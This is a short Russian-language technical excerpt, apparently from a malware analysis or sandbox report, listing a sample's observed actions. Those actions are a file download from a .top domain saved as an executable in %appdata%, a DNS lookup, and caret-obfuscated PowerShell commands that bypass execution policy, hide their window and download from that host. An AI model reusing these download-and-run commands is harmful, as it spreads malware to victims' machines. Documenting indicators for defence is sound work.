Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^ersHelL^.exe^ ^-execUt^ION^P^O^LI^CY^ bY^PaSs ^-nop^rofi^L^e ^-wi^N^DO^WStyLE ^H^i^D^Den (N^E^w-Ob^Je^ct^ sY^steM^.^nEt.^WE^bCLI^En^t).D^Own^loA^dF^ILE('http://zonexxopera...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "pow^ersHelL^.exe^ ^-execUt^ION^P^O^LI^CY^ bY^PaSs ^-nop^rofi^L^e ^-wi^N^DO^WStyLE ^H^i^D^Den (N^E^w-Ob^Je^ct^ sY^steM^.^nEt.^WE^bCLI^En^t).D^Own^loA^dF^ILE('http://zonexxopera...' (со скрытым окном)